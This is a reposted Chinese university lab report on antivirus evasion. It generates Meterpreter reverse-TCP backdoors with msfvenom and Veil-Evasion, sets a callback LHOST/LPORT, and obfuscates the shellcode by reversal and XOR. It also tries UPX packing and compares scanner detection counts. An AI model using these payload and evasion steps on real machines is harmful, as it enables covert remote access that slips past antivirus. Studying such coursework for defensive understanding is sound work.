博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Exp3 免杀原理与实践20154302薛师凡
阅读量:7105 次
发布时间:2019-06-28

本文共 1363 字,大约阅读时间需要 4 分钟。

Exp3 免杀原理与实践20154302薛师凡

一、实践目标与内容

利用多种工具实现实现恶意代码免杀

在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功。
在保证后门程序功能的情况下实现杀软共存。

二、实践过程与步骤

1.使用msf编码器生成的后门程序

上次实践生成的后门程序,直接被360发现了,在virscan网站扫描,也有17个杀毒引擎识别了出来,很容易被辨识出来的。

1354500-20180407200101116-1662967061.jpg

2.使用veil-evasion生成的后门程序

2.1安装veil平台

apt-get install veil-evasion
1354500-20180407200347712-1092472379.jpg
1354500-20180407200409996-2093865131.jpg
1354500-20180407200419186-457766156.jpg

2.2根据菜单选择一个模板生成,在这里我选择的是evasion里的c语言中的(第7行)

1354500-20180407200549376-1902263364.jpg
1354500-20180407200600891-105194536.jpg
1354500-20180407200607501-1065990038.jpg

2.3设置相关参数即

set LHOST 192.168.199.239

set LPORT 4302

generate

1354500-20180407200635883-1095799458.jpg
1354500-20180407200657895-1309803092.jpg

2.4找到生成的程序拷贝到主机后,没有被360查出来,virscan扫描有8个杀毒引擎识别了出来,还可以。

1354500-20180407200857927-1203698643.jpg

开始找不到生成的程序,可以在本地电脑搜索veil,找到var/lib下的veil,打开output->compiled,就可以找,后拖至主机。或者用指令复制cp -r 要复制的文件夹绝对地址 /root

1354500-20180407200732687-285584383.jpg
1354500-20180407200741124-363941788.jpg

然后回连试一试

1354500-20180407200913777-785017591.jpg

3.shellcode编程

3.1在Kali下生成一个C语言格式的shellcode数组,回连的IP为Kali的IP,端口自定。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.239 LPORT=4302 -f c
1354500-20180407201007526-2125851875.jpg

得到数组后开始编程。

1354500-20180407200946992-1853983367.jpg

3.3拷贝至win10,能直接被360识别出来,virscan扫描有6个引擎可以识别出来且能回连成功

1354500-20180407201052949-1488827361.jpg

3.4我对shellcode进行倒序,换位,异或,在win10环境下,在codeblock进行编译,不会被360识别出来,virscan也只有3个引擎能识别出来

1354500-20180407201341006-1591915559.jpg

4.对程序进行加壳

upx 4302.exe -o 4302upx.exe

实际并没有什么用,加壳后能识别出来的引擎数基本没变甚至还会变多
1354500-20180407201159184-1635738230.jpg

加壳后居然有12个引擎识别出来了:

1354500-20180407201227420-1936714733.jpg

三、基础问题回答

杀软是如何检测出恶意代码的?

我认为现在的杀软主要是基于特征码进行检测的,特征码就是一段或多段数据,如果一个可执行文件包含这样的数据或者文字名称则被认为是恶意代码。还有就是基于行为的恶意软件检测,就是通用的、多特征的、非精确的扫描。

免杀是做什么?

免杀即使杀毒软件检测不出恶意软件的手段。

免杀的基本方法有哪些?

通过多种方式改变特征码,例如加壳,生成shellcod,用其他语言进行重写再编译等等。

改变行为,例如改变通讯方式(使用反弹式连接)和操作模式(加入混淆作用的正常功能代码)。

四、离实战还缺些什么技术或步骤?

想办法让目标主机在不知不觉中运行恶意软件。毕竟没人会主动打开一个恶意软件。

五、实践总结与体会

通过这次实践,我们实现了部分恶意软件的免杀,虽然有时候回连会出现问题,但是这个过程其实不是很复杂,这简单的过程就让诸多杀毒软件束手就擒,这不禁让人为我们个人的信息安全感到恐慌。

转载于:https://www.cnblogs.com/xsfdbk/p/8734531.html

你可能感兴趣的文章
Android TextView中文字通过SpannableString来设置超链接、颜色、字体等属性
查看>>
2016的个人总结
查看>>
python __file__ 和 sys.argv[0] 的区别
查看>>
异常捕获不抛出,Spring事务无法回滚
查看>>
小蚂蚁学习数据结构(9)——递归
查看>>
【VMCloud云平台】私有云门户第一朵VM云(三)
查看>>
用python实现API --- 提供组件能够方便实现开放API
查看>>
北京让我欢喜让我忧
查看>>
FTP传输模式
查看>>
crontab 报错
查看>>
5、MySQL主健和索引
查看>>
基于jquery与raphael实现的在线批阅
查看>>
linux shell 脚本攻略(上)
查看>>
前端工程师小A学习JS的旅程
查看>>
TextView使用
查看>>
使用ffmpeg/libav进行桌面视频和音频的录制。
查看>>
气体传感器资料
查看>>
linux下配置SS5(SOCK5)代理服务
查看>>
订阅发生异常代理消息代码 20598,个人总结
查看>>
angular2中循环遍历再增加一组数组可以删除可以增加
查看>>